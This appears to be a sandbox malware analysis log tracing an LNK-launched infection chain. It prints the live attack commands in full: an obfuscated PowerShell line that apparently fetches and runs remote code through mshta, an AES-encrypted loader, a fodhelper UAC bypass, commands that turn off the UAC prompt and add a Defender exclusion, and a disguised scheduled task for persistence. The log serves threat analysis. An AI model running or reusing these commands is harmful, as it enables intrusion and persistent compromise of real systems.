Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer ;565,571,560,572,553,488,560,572,572,568,514,503,503,513,505,502,513,506,502,506,508,512,502,507,510,503,524,567,575,566,564,567,553,556,571,503,555,567,566,558,561,559,502,557,576,557\|%{$n+=[char]($_-456)};$n \| powershell -}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -ep Unrestricted -nop Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w 1 -ep Unrestricted -nop schtasks.exe /TN MicrosoftEdgeUpdateTaskMachine /CREATE /F /TR C:\Users\user\AppData\Roaming\tiago.exe /SC ONLOGON
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer ;565,571,560,572,553,488,560,572,572,568,514,503,503,513,505,502,513,506,502,506,508,512,502,507,510,503,524,567,575,566,564,567,553,556,571,503,555,567,566,558,561,559,502,557,576,557\|%{$n+=[char]($_-456)};$n \| powershell -}	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -ep Unrestricted -nop Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w 1 -ep Unrestricted -nop schtasks.exe /TN MicrosoftEdgeUpdateTaskMachine /CREATE /F /TR C:\Users\user\AppData\Roaming\tiago.exe /SC ONLOGON

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF8490132B2		2_2_00007FF8490132B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FF848FF2E31		18_2_00007FF848FF2E31

Source: Process Memory Space: powershell.exe PID: 7480, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7600, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1960:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F48169 push ebx; ret	2_2_00007FF848F4816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F48405 push eax; ret	2_2_00007FF848F4846D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F4782E pushad ; iretd	2_2_00007FF848F4785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F4785E push eax; iretd	2_2_00007FF848F4786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F400BD pushad ; iretd	2_2_00007FF848F400C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF848F400BD pushad ; iretd	4_2_00007FF848F400C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF848F422D0 push eax; iretd	4_2_00007FF848F4233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF848F408E8 push E95AB91Ch; ret	4_2_00007FF848F40909
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF848F400BD pushad ; iretd	7_2_00007FF848F400C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FF848E0D2A5 pushad ; iretd	18_2_00007FF848E0D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FF848F20525 pushad ; retf	18_2_00007FF848F205ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FF848F2753A push ebx; iretd	18_2_00007FF848F2756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FF848F205EF pushad ; retf	18_2_00007FF848F205ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FF848F200BD pushad ; iretd	18_2_00007FF848F200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FF848F26FB3 push eax; retf	18_2_00007FF848F26FC1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FF848FF2333 push 8B485F93h; iretd	18_2_00007FF848FF233B

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4629	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4900	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 772	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5709	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3807	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3699
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6252
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2109
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 711

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300	Thread sleep count: 772 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304	Thread sleep count: 215 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7440	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560	Thread sleep count: 5709 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560	Thread sleep count: 3807 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652	Thread sleep count: 5700 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656	Thread sleep count: 3699 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204	Thread sleep count: 711 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832	Thread sleep count: 170 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: mshta.exe, 00000005.00000002.2917406886.000001F0BD8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2907320112.000001F0BD8B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWR
Source: mshta.exe, 00000005.00000002.2917629012.000001F0BD8F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2907320112.000001F0BD89A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2912251391.000001F0BD8F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2917406886.000001F0BD89B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2907162331.000001F0BD8F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3222152935.000002326423F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3219687761.000002325EA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3222243361.0000023264254000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000005.00000002.2920102582.000001F8C0750000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\,KV,QY
Source: tiago.exe, 00000033.00000002.3225848720.00000262571DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: unknown	Process created: C:\Windows\System32\wscript.exe "c:\windows\system32\wscript.exe" "c:\windows\system32\syncappvpublishingserver.vbs" ;565,571,560,572,553,488,560,572,572,568,514,503,503,513,505,502,513,506,502,506,508,512,502,507,510,503,524,567,575,566,564,567,553,556,571,503,555,567,566,558,561,559,502,557,576,557\|%{$n+=[char]($_-456)};$n \| powershell -
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noninteractive -windowstyle hidden -executionpolicy remotesigned -command &{$env:psmodulepath = [io.directory]::getcurrentdirectory(); import-module appvclient; sync-appvpublishingserver ;565,571,560,572,553,488,560,572,572,568,514,503,503,513,505,502,513,506,502,506,508,512,502,507,510,503,524,567,575,566,564,567,553,556,571,503,555,567,566,558,561,559,502,557,576,557\|%{$n+=[char]($_-456)};$n \| powershell -}
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $waulzkw = 'aaaaaaaaaaaaaaaaaaaaac7jt7k2fpd87clirj9isnhddppfvzatppoiatytldflieew9wcm5gznag730ovvdvcx2w3yrhgvqgbwqrix1uuazcugn8esccvcts0qichjyeddbgezilsxr1p4ogmfx28mlt4honstx3p9ixj2nvrwlwviigsbkcc8iw0igrimyczjnavpn0behsv1pbpa/uspan1mrqr7oiuaxcd7so8vyolommuygb6txkck2eafrqc5jziy/b6l+tskfr2tajtbwnesaj3v0pjwpwc7bictgblifj7ffrqof+y9hdbpb2wr45/goyndklb3gybsxasmw0gcitx/38zqgjlyitpzhemmpt+qkripz1puuoqtq3nrq1gr4iptsyzjt1lo6zqoaasoq8daa1tjjb7lbpmbwa3azu+dgchrt5aoqjteagznmzrmcilcgnktqe+ocr9lzvgwxk5hb/lmb015dusif5fwn3ou7fghcpitfamjx9smk+7wdbeexnd3poufjec78eetgmhnakodzs3k7xhbhgkznwx/uxit61u5sbycoqz60ethpxku00sz3thilgs9d1c76rdtxy5pkhajfhbjszfg80uui2o77utg8n5alsamooqysrdws3aobsxtyzbowd+w4uk5cfosyucr4jqauwarcyt2yj1jhskxaenoo7xknelgvpic8fxgevyzn0ezpbt7kyo3xwbvhwc4jvbl2dfzv8pijhgkvzt7v+n53fglw52t/+lurhoactx1trlls7utkgjb0nsq3uzudizuyvyyzkqypce2i/xrdylfwosxnkknvlx+dwp7awedhlkuengn8jrddrnio8h0jm1lzdjzjxvzoffize+1vykn81iecz8rcfc4ivti1jw4wiww3yhcvw4cjfyde3m3zlsy5ripw40/q+pjw19tnqarsg9cr1uqblgjrowqx1l3dhkcpz4p8rtapign+rjdvugllvr/i6qn7cyct+pbs/fchufvvsv9tgwy8aehifovjntzppnxk8ccizq04mlje25/iuvy58geyi3otgbz5yigm9ptdzmzsygthr7tva48jutpfloqfedubser9eczvpadnlxpbm1iy4babcjk2rhn6gxh42fbzckycwcjrnrtwukgwa+e6q7hlwijvoitmnipzdjlw68tw2ef4zsgggws96009c414dcismzum65niiko+izlbz/skb95+1nnptx504n85rpdq23vt8viofrasfzbit0znw6itlwc+uyta0+lxrdu+lu68zfh8i7dyqscezg5zhxyydrf0vewxgzz12vi4zvnbueeugcimkmfv4d+ty6xxvtbdu5yp6lc4j6k1ga54gkeaghfe2tkdf1ymxwpvwiu/jti3ydo8qafjyhi3wmvpzqwxec4ohwbohwszxubjqhzdr1vbkp0zczx7ftjqxgof9o+qh9twlcec31cfcsddl9zi7o00jr13e0p0ndnpyfnuzsw9d4giern9ityfrsbaztgjl/uxj4plm10ktan6++xcgmfn5jkinzjpbfluktinrvzmkf/k6rfprpoivdovn4j6xzeybr5wjvy2tzrm/un2hd5d91ysypzyoqifwcnre4grze79qsa6te4cuut+6dpmn0in39thcfpvhq8+br8tufxfodjiuj8dafjgkmaz07ey8a/nljeh7zxjjhramizosky+t+5xbiik7nqs4brt/xcat15oq/nqnt4mewgzj62hcjcrd5/q9mr0p4lvmtvjc546huzxrturjqgbqa7giknn7ryz3ghsuet340egqsu/2vjo7fdrl7knphvbnive5+ji1/d0zedislwnyouznxv0pqrif/z5cwwqwjuwb9qppheumuldmydfaq/evwpypyfrwhri00g3frr+tjqiqi7yiw8nlui8ocg7pey1ffnpx8pytoo1vswttjjoitkekmyuak/selhgwidlsrc72vdqellmy4k5pbis3vzaofa7caupldh';$ogscjgji = 'skphrvl2tnv5dfntyw5ddhvybgrpqk5qandwrlpou0o=';$bwerijm = new-object 'system.security.cryptography.aesmanaged';$bwerijm.mode = [system.security.cryptography.ciphermode]::ecb;$bwerijm.padding = [system.security.cryptography.paddingmode]::zeros;$bwerijm.blocksize = 128;$bwerijm.keysize = 256;$bwerijm.key = [system.convert]::frombase64string($ogscjgji);$ffimt = [system.convert]::frombase64string($waulzkw);$dphrhabw = $ffimt[0..15];$bwerijm.iv = $dphrhabw;$vvefzcbje = $bwerijm.createdecryptor();$qfkmuzafd = $vvefzcbje.transformfinalblock($ffimt, 16, $ffimt.length - 16);$bwerijm.dispose();$fdicvmkx = new-object system.io.memorystream( , $qfkmuzafd );$hebjfzmz = new-object system.io.memorystream;$bijbqdkjw = new-object system.io.compression.gzipstream $fdicvmkx, ([io.compressi
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -ep unrestricted -nop set-itemproperty -path registry::hkey_local_machine\software\microsoft\windows\currentversion\policies\system -name consentpromptbehavioradmin -value 0;add-mppreference -exclusionpath c:\users\user\appdata\roaming;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noninteractive -windowstyle hidden -executionpolicy remotesigned -command &{$env:psmodulepath = [io.directory]::getcurrentdirectory(); import-module appvclient; sync-appvpublishingserver ;565,571,560,572,553,488,560,572,572,568,514,503,503,513,505,502,513,506,502,506,508,512,502,507,510,503,524,567,575,566,564,567,553,556,571,503,555,567,566,558,561,559,502,557,576,557\|%{$n+=[char]($_-456)};$n \| powershell -}	Jump to behavior
